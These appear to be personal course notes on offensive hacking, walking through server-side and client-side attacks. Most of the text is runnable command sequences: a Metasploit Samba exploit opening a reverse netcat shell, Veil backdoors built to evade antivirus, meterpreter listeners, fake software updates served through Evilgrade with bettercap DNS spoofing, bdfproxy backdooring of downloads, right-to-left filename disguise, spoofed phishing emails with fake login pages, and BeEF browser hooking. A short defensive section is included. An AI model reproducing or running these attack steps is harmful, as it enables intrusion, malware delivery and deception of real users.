Gaining Access¶
Introduction¶
Everything is a Computer¶
Two main approaches
Server Side
Do not require user interaction, all we need is a target IP
Start with information gathering, find open ports, OS, installed services, and work from there
Client Side
Require user interaction, such as opening a file, a link
Information gathering is key here, create a trojan and use social engineering to get the target to run it.
Server-Side Attacks¶
Need an IP Address
Very simple if target is on the same network (netdiscover or zenmap)
If target has a domain, then a simple ping will return its IP
Getting the IP is trickier if the target is a personal computer, might be useless if the target is accessing the internet through a network as the IP will be the router and not the targets, client side attacks are more effective in this case asa reverse connection can be used.
Basic Information Gathering & Exploitation¶
Try default password
Services might be mis-configured, such as the “r” service. Ports 512, 513, 514
Some might even contain a back door!
Code execution vulnerabilities
Analysing Trojans¶
Check properties of the file
Is it what it seems to be
Run the file in a virtual machine and check resources
Use an online sandbox service (https://www.hybrid-analysis.com)
Using the Above Attacks Outside the Network¶
All of the server-side and client-side attacks work outside the network.
You just need to configure the connection properly.
This can be done using:
Port forwarding through the router
Installing Kali / tools on the cloud
Port forwarding using SSH
Tunneling services
Metasploit¶
Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.
You can Google the open ports exploits and copy the exploit name from rapid7.com to get the exploit name.
msfconsole - runs the metasploit console
help - shows help
show [something] - something can be exploits, payloads, auxiliaries or options.
use [something] - use a certain exploit, payload or auxiliary.
set [option] [value] - configure [option] to have value of [value]
exploit - runs the current task
Example:
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 10.20.14.204
show options
show payloads
set PAYLOAD cmd/unix/reverse_netcat
show options
set LHOST 10.20.14.203
exploit
Nexpose¶
Vulnerability Management Framework
Discover open ports and running services
Find vulnerabilities
Find exploits
Verify them
Generate reports
Automate scans
Conclusion¶
The general steps are always the same!
Discover open ports and running services
Find vulnerabilities
Find exploits
Exploit / verify
Report
Client-Side Attacks¶
Use if server side attacks fail
If IP is probably useless
Requires user interaction
Social engineering can be very useful
Information gathering is vital
Veil - Framework¶
A backdoor is a file that gives us full control over the macine that it gets executed on
Backdoors can be caught by Anti-Virus programs
Veil is a framework for generating undetectable backdoors
Veil Overview & Generating Backdoor¶
use 1
list
use 15
set LHOST 10.20.14.213
set LPORT 8080
options
set PROCESSORS 1
set SLEEP 6
generate
rev_https_8080
Google nodistribute
Upload the file
See the program being undetected from antivirus programs
Listening for Incoming Connections¶
msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.20.14.213
set LPORT 8080
show options
exploit
Delivery Method¶
Put your backdoor file in /var/www/html in Kali
service apache2 start
Browse, download and start the exe file on Windows
Simple method which wont work see below
Windows 10 Fake Updates¶
Fake an update for an already installed program
Install backdoor instead of the update
Requires DNS spoofing + Evilgrade (a server to serve the update)
Download and install Evilgrade
Download Evilgrade.zip
Go to the downloads and boule click evilgrade.zip to uncompress it.
Open a terminal and run the following commands:
cd /root/Downloads/evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML
cp -r isrcore /etc/perl
Now the tool will work, it might display an error about Gnu.pm this is a known bug with evil-grade, if its annoying you the you can get rid of it using the by removing that lib using the following command
apt-get remove libterm-readline-gnu-perl
Just make sure you re-install it after you’re done in case it is needed by other tools
apt-get install libterm-readline-gnu-perl
Start Evilgrade (./configure)
Check programs that can be hijacked (show modules)
Select one (configure [module])
Set backdoor location (set agent [agent location])
Start Server (start)
Start dns spoofing and handler
# Once in evilgrade:
cd /opt/evilgrade
./evilgrade
show options
configure dap
show options
set agent /var/www/html/backdoor.exe
set endsite www.speedbit.com
show options
start
# Become MITM
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set.spoof.domains update.speedbit.com
dns.spoof on
# Listen for connections
# Then wait for the user to look for updates
Backdoor Windows 10 Downloads on the Fly¶
Backdoor any exe the target downloads
We need to be MITM
Set IP Address in config (leafpad /etc/bdfproxy/bdfproxy.cfg)
proxyMode = transparent
# Windows
HOST = 10.0.2.15
Start bdfproxy (bdfproxy)
cd /opt/BDFProxy
./bdf_proxy.py
Redirect traffic to bdfproxy (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080)
Start listening for connections (msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc)
Start arp spoofing
Protecting Yourself Against Smart Delivery Methods¶
Ensure you’re not being MITMed - use trusted networks, xarp
Only download from HTTPS pages
Check file MD5 after download - http://www.winmd5.com
Social Engineering¶
Gather info about the users
Build a strategy based on the info
Build a backdoor based on the info
Maltego¶
Maltego is an information gathering tool that can be used to collect information about anything.
Target can be a website, company, person, etc.
Discover entities associated with target
Display info on a graph
Come up with an attack strategy
Backdooring any File¶
Combine backdoor with any file - generic solution
Users are more likely to run a pdf, image, or audio file than an executable
Works well with social engineering
How?
Use autoit to compile the backdoor file
Use right to left character (search for character in Kali) and replace .exe with gpj.exe and paste the special character after the name of the file
Fake Emails¶
Send fake emails
Looks like its sent from any address
Pretend to be a friend, company, boss, etc.
Friend - Ask them to open a file (image, pdf, etc.)
Support member - ask to login to control panel using fake login page
Support member - ask to run a command on a server
Ask to visit a normal web page
etc.
Use attached sendmail.php
Beef Framework¶
Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook url
DNS spoof requests to a page containing the hook
Inject the hook in brosed pages (need to be MITM)
Use XSS exploit
Social engineer the target to open a hook page
Get the user to browse to your beef page